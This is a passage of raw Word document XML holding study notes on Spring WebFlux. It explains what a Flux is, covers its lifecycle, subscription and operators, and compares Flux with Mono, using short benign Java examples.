      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Maybe one T, or empty/error — but never more than one."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E5F2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42" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4F683" w14:textId="129DD07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5" w:name="_Toc197867719"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Flux in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w14:paraId="5BA53320" w14:textId="65A60359" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8"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a Flux represents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA72F3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A reactive stream of 0 to N asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBFE1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79A612">
          <v:rect id="_x0000_i2243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E09F56"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Basics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D894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1C99076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 (like Mono).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD7E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d when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAACF3"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You expect </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189CD3B"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even </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9319F1"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nd it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking/asynchronous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56ED4C"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4B549">
          <v:rect id="_x0000_i2244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA3FA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862"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="492A45F2" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C972C3"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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1344958F"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3EBF6942" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75CA3B3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4D9E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tream of String values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1E5C5C27" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5035EF0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User&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401FC8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list/stream of User objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="05FB063F" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584802B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Void&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9DB37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completion signal or error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A2B57D6"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BACEE">
          <v:rect id="_x0000_i2245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5620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041E12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lice", "Bob", "Charlie");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C85E39" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D3618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Integer&gt; range = Flux.range(1, 5); // emits 1 to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55529546" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C356E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mptyFlux = Flux.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3D14C" w14:textId="77777777" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0FA0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rrorFlux = Flux.error(new RuntimeException("Something went wrong"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE562F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F5E029">
          <v:rect id="_x0000_i2246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1392C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gridCol w:w="1456"/>
        <w:gridCol w:w="2382"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="05AFB9B3" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FF384D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0C3CC33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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1219DFE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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="07FE430A" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4173C98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Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12069D5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22CF5BB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to N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="2D3EAE9C" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="405E9C0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089426F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response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A684B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ultiple/streamed values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6BF29652" w14:textId="77777777" w:rsidTr="002951F8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58BD64B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xample</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CED79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user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E30A9E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st of users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21CAC19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47" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7187E2" w14:textId="10F3782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6" w:name="_Toc197867720"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Flux works</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w14:paraId="59817A51" w14:textId="598D541C" w:rsidR="002951F8" w:rsidRPr="00372576" w:rsidRDefault="002951F8" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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How Flux Works in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E50F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lux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specification that emits </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0 to N element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asynchronously and non-blockingly</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB5D26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05DF8A">
          <v:rect id="_x0000_i2248" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="365580C0"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Flux Emits Data Over Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09391C9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nk of Flux like a stream — it pushes data as it's available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0ABAB3"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pull-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the beginning (requesting data) and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when emitting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A949C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5D929E">
          <v:rect id="_x0000_i2249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81498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Creation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE131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 "B", "C");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F0D6E"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emits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0193180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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D3BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB8319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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E538B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36146D9E"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CE76F0">
          <v:rect id="_x0000_i2250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE17A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Flux Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E74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w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need a subscriber to consume the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEF93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quest</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Subscriber requests N items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBDA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w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flux emits elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AFFD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Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Emits completion signal or error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16185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5B5B03B">
          <v:rect id="_x0000_i2251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1EDF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Subscription Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C032DC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ames.subscribe(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100916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ata -&gt; System.out.println("Received: " + data),         // onNext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD6C8E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err -&gt; System.err.println("Error: " + err),               // onError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E701E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 -&gt; System.out.println("Stream Completed")              // onComplete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404060E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0D2F01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366F26">
          <v:rect id="_x0000_i2252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751583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Operators Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B299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You can chain operators like map, filter, flatMap, take, etc.:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC77A1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range(1, 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3237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filter(i -&gt; i % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9449A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i -&gt; "Even: " + i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB233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subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E33672"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52C2A0">
          <v:rect id="_x0000_i2253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC8D1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Flux Controller Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE088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numbers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A9E2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Flux&lt;Integer&gt; getNumbers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1257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Flux.range(1, 5);  // emits 1 to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867190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7637F071"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0121FC">
          <v:rect id="_x0000_i2254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B100327"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p w14:paraId="1055E2C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 0-N values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9F6E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and non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB223D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ful for streaming and reactive data handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60157E6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orks well with backpressure and reactive pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E9E4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ant a real-world use case example with DB or REST call using Flux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42118BE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55" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9679A" w14:textId="32B8CCF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7" w:name="_Toc197867721"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Flux differ from Mono</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="12A0DE94" w14:textId="29F7FB96" w:rsidR="002951F8" w:rsidRPr="00BF46DF" w:rsidRDefault="002951F8"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Flux and Mono in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40878FE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oth Flux and Mono are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> types in Spring WebFlux, but they are used for different purposes. Let's break down the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA99832"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9EE4">
          <v:rect id="_x0000_i2256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24407DD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mitted Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5929A755"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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an empty result (i.e., 0 or 1 value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05411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r a sequence of values (i.e., 0 to N values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0028E"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p>
    <w:p w14:paraId="078EAF3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 for a single item:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4C2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Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0942F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 for multiple items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AD51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5BADF221"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9D7814">
          <v:rect id="_x0000_i2257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EB1E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Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CDE6B"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a single value</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no value at all</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (empty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D5204"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ingle record queries, HTTP request/response, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E601E3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ver time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68734D96"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treaming data, fetching collections of items, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A746323"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47CA6">
          <v:rect id="_x0000_i2258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C01EB"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Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB263C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Does not deal with backpressure because it only handles one value (or none).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB514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upports backpressure since it can emit multiple values, and subscribers can specify how much data they want to handle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A597478"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FE96A4">
          <v:rect id="_x0000_i2259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D606A0"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Completion Signal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8D23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lastRenderedPageBreak/>
        <w:t>Mono:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Signals completion after emitting the value (or signaling an empty result). It can either </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
